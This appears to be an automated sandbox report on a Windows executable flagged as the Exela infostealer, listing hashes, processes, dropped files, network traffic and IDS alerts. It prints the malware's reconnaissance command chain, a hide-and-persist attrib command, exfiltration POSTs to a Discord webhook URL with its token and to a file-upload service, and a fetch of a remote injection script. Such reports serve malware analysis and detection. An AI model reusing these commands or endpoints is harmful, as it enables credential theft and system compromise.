| File name: | WEEB6_SystemUpdate.exe |
| Full analysis: | https://app.any.run/tasks/b57e1026-7717-414c-a46d-237f747f25da |
| Verdict: | Malicious activity |
| Threats: | Exela Stealer is an infostealer malware written in Python. It is capable of collecting a wide range of sensitive information from compromised systems and exfiltrating it to attackers over Discord. It is frequently used to steal browser data, and obtain session files from various applications, including gaming platforms, social media platforms, and messaging apps. |
| Analysis date: | March 25, 2025, 02:28:51 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, 12 sections |
| MD5: | 812FB887E9DBA4A5484FEF3E0AFFE368 |
| SHA1: | A96A4132B8F03810D0C3862FA90108DA8CC0BCE6 |
| SHA256: | 5D99F5BF54C9D7728BBFD50F75B462D453130FFF7DF37A039CB8CFD490B2E397 |
| SSDEEP: | 393216:U2F5/YFLta9ZlbOaiTerOSQBq0vOe9fxfffoSQ/:UMQpavlSTRT9fJffoT |
| .exe | | | Win64 Executable (generic) (87.3) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (6.3) |
| .exe | | | DOS Executable Generic (6.3) |
| MachineType: | AMD AMD64 |
|---|---|
| TimeStamp: | 2024:10:23 10:04:47+00:00 |
| ImageFileCharacteristics: | Executable, No line numbers, No symbols, Large address aware, No debug |
| PEType: | PE32+ |
| LinkerVersion: | 2.41 |
| CodeSize: | 111104 |
| InitializedDataSize: | 40387584 |
| UninitializedDataSize: | 146944 |
| EntryPoint: | 0x10f6 |
| OSVersion: | 4 |
| ImageVersion: | - |
| SubsystemVersion: | 5.2 |
| Subsystem: | Windows GUI |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 664 | tasklist /FO LIST | C:\Windows\System32\tasklist.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Lists the current running tasks Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 664 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES3209.tmp" "c:\Users\admin\AppData\Local\Temp\CSC611227B37D6F4D2883C2558D5541202F.TMP" | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | — | csc.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 14.32.31326.0 Modules
| |||||||||||||||
| 864 | "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hellion.exe" | C:\Users\admin\AppData\Local\Temp\onefile_6228_133873433679307961\Stub.exe | — | Hellion.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 1052 | net user guest | C:\Windows\System32\net.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1228 | net user administrator | C:\Windows\System32\net.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1328 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1660 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1660 | tasklist /svc | C:\Windows\System32\tasklist.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Lists the current running tasks Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1676 | C:\WINDOWS\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config" | C:\Windows\System32\cmd.exe | — | Stub.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2088 | C:\WINDOWS\system32\cmd.exe /c "attrib +h +s "C:\Users\admin\AppData\Local\HellionUpdate\Hellion.exe"" | C:\Windows\System32\cmd.exe | — | Stub.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (7380) TiWorker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing |
| Operation: | write | Name: | SessionIdHigh |
Value: 31169837 | |||
| (PID) Process: | (7380) TiWorker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing |
| Operation: | write | Name: | SessionIdLow |
Value: | |||
| (PID) Process: | (2340) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (2340) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (2340) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 7844 | WEEB6_SystemUpdate.exe | C:\Users\admin\AppData\Local\Temp\onefile_7844_133873433562276466\Stub.exe | — | |
MD5:— | SHA256:— | |||
| 7844 | WEEB6_SystemUpdate.exe | C:\Users\admin\AppData\Local\Temp\onefile_7844_133873433562276466\_bz2.pyd | executable | |
MD5:56203038756826A0A683D5750EE04093 | SHA256:31C2F21ADF27CA77FA746C0FDA9C7D7734587AB123B95F2310725AAF4BF4FF3C | |||
| 7844 | WEEB6_SystemUpdate.exe | C:\Users\admin\AppData\Local\Temp\onefile_7844_133873433562276466\_multiprocessing.pyd | executable | |
MD5:B3C8414BBCAE9BCC3377A4DF72A4AED7 | SHA256:65413D49D81E5B939226A211FD40C9B7C6D61366651639446273988930F4A6FD | |||
| 7844 | WEEB6_SystemUpdate.exe | C:\Users\admin\AppData\Local\Temp\onefile_7844_133873433562276466\_ctypes.pyd | executable | |
MD5:462FD515CA586048459B9D90A660CB93 | SHA256:BF017767AC650420487CA3225B3077445D24260BF1A33E75F7361B0C6D3E96B4 | |||
| 7844 | WEEB6_SystemUpdate.exe | C:\Users\admin\AppData\Local\Temp\onefile_7844_133873433562276466\_cffi_backend.pyd | executable | |
MD5:2BAAA98B744915339AE6C016B17C3763 | SHA256:4F1CE205C2BE986C9D38B951B6BCB6045EB363E06DACC069A41941F80BE9068C | |||
| 7844 | WEEB6_SystemUpdate.exe | C:\Users\admin\AppData\Local\Temp\onefile_7844_133873433562276466\_lzma.pyd | executable | |
MD5:14EA9D8BA0C2379FB1A9F6F3E9BBD63B | SHA256:C414A5A418C41A7A8316687047ED816CAD576741BD09A268928E381A03E1EB39 | |||
| 7844 | WEEB6_SystemUpdate.exe | C:\Users\admin\AppData\Local\Temp\onefile_7844_133873433562276466\_queue.pyd | executable | |
MD5:60DEC90862B996E56AEDAFB2774C3475 | SHA256:9568EF8BAE36EDAE7347B6573407C312CE3B19BBD899713551A1819D6632DA46 | |||
| 7844 | WEEB6_SystemUpdate.exe | C:\Users\admin\AppData\Local\Temp\onefile_7844_133873433562276466\_decimal.pyd | executable | |
MD5:709613D7D7BC30ABDAEE015C331664B6 | SHA256:8600CAE4F34CC64C406198E19539D0D4F5A574FC60B32B8AA8F32FD64C981DA5 | |||
| 7844 | WEEB6_SystemUpdate.exe | C:\Users\admin\AppData\Local\Temp\onefile_7844_133873433562276466\_hashlib.pyd | executable | |
MD5:7A74284813386818ADA7BF55C8D8ACF9 | SHA256:21A1819013DE423BB3B9B682D0B3506C6EF57EE88C61EDF4BA12D8D5F589C9C2 | |||
| 7844 | WEEB6_SystemUpdate.exe | C:\Users\admin\AppData\Local\Temp\onefile_7844_133873433562276466\libcrypto-1_1.dll | executable | |
MD5:80B72C24C74D59AE32BA2B0EA5E7DAD2 | SHA256:EB975C94E5F4292EDD9A8207E356FE4EA0C66E802C1E9305323D37185F85AD6D | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2104 | svchost.exe | GET | 200 | 2.16.164.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
7864 | Stub.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/json | unknown | — | — | whitelisted |
— | — | GET | 200 | 34.117.59.81:443 | https://ipinfo.io/json | unknown | binary | 270 b | whitelisted |
— | — | POST | 204 | 162.159.128.233:443 | https://discord.com/api/webhooks/1298586615320543243/VX51eyP8SGKQmHPpvz997KjtFumP9Gs9Na-0Fqci3i4_-t-FuRYtn5sqtZRqqdUVusVS | unknown | — | — | whitelisted |
— | — | POST | 500 | 40.91.76.224:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | whitelisted |
— | — | POST | 200 | 45.112.123.227:443 | https://store1.gofile.io/uploadFile | unknown | binary | 432 b | whitelisted |
— | — | GET | 404 | 51.91.7.6:443 | https://api.gofile.io/getServer | unknown | text | 14 b | whitelisted |
— | — | POST | 204 | 162.159.137.232:443 | https://discord.com/api/webhooks/1298586615320543243/VX51eyP8SGKQmHPpvz997KjtFumP9Gs9Na-0Fqci3i4_-t-FuRYtn5sqtZRqqdUVusVS | unknown | — | — | whitelisted |
— | — | GET | 200 | 140.82.121.3:443 | https://raw.githubusercontent.com/justforExela/injection/main/injection.js | unknown | binary | 28.6 Kb | whitelisted |
— | — | POST | 500 | 40.91.76.224:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
2104 | svchost.exe | 2.16.164.120:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted |
— | — | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
7864 | Stub.exe | 34.117.59.81:443 | ipinfo.io | GOOGLE-CLOUD-PLATFORM | US | whitelisted |
7864 | Stub.exe | 162.159.128.233:443 | discord.com | CLOUDFLARENET | — | whitelisted |
7864 | Stub.exe | 162.159.135.232:443 | discord.com | CLOUDFLARENET | — | whitelisted |
7864 | Stub.exe | 208.95.112.1:80 | ip-api.com | TUT-AS | US | whitelisted |
7864 | Stub.exe | 185.199.109.133:443 | raw.githubusercontent.com | FASTLY | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
ipinfo.io |
| whitelisted |
discord.com |
| whitelisted |
ip-api.com |
| whitelisted |
raw.githubusercontent.com |
| whitelisted |
api.gofile.io |
| whitelisted |
store1.gofile.io |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
7864 | Stub.exe | Device Retrieving External IP Address Detected | ET INFO Possible External IP Lookup Domain Observed in SNI (ipinfo. io) |
2196 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Lookup (ipinfo .io) |
— | — | Attempted Information Leak | ET INFO Python-urllib/ Suspicious User Agent |
— | — | Device Retrieving External IP Address Detected | ET INFO External IP Lookup ipinfo.io |
2196 | svchost.exe | Misc activity | ET INFO Observed Discord Domain in DNS Lookup (discord .com) |
7864 | Stub.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI) |
2196 | svchost.exe | Misc activity | ET INFO Discord Chat Service Domain in DNS Lookup (discord .com) |
7864 | Stub.exe | Misc activity | ET INFO Observed Discord Service Domain (discord .com) in TLS SNI |
— | — | Misc activity | ET HUNTING Discord WebHook Activity M1 (Contains Key, content) |
7864 | Stub.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI) |